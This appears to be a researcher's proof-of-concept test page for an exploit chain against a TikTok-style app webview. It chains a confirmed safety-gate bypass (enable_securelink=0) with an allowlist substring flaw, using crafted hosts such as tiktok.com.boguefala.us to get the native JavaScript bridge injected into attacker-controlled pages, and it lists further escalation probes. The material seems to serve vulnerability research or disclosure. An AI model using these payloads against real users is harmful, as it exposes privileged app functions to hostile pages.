SCC bypass → bridge chain — lrd0036

CONFIRMED: enable_securelink=0 loads arbitrary URLs past the safety gate. Now chaining the p_checkURLInAllowDomain substring flaw (host contains an allowlisted token) to get the native bridge injected. WIN = red page renders AND its webkit.messageHandlers box is non-empty.

1 · confirmed SCC bypass (baseline — should load, bridge likely empty)

boguefala.us/poc &enable_securelink=0

2 · FULL CHAIN — SCC off + host-substring for bridge injection

tiktok.com.boguefala.us/poc &enable_securelink=0 …tiktok.com.boguefala.us + param both places

3 · other allowlist tokens (if tiktok.com isn't the allowlisted one)

tiktokv.com.boguefala.us/poc &enable_securelink=0 webcast.tiktok.com.boguefala.us/poc &enable_securelink=0

4 · Safari controls

tiktok.com.boguefala.us/poc in Safari

5 · bounded escalation probes

privilege probe: origin/CORS/storage isolation chain probe: JS -> snssdk webview route chain probe: iframe -> snssdk webview route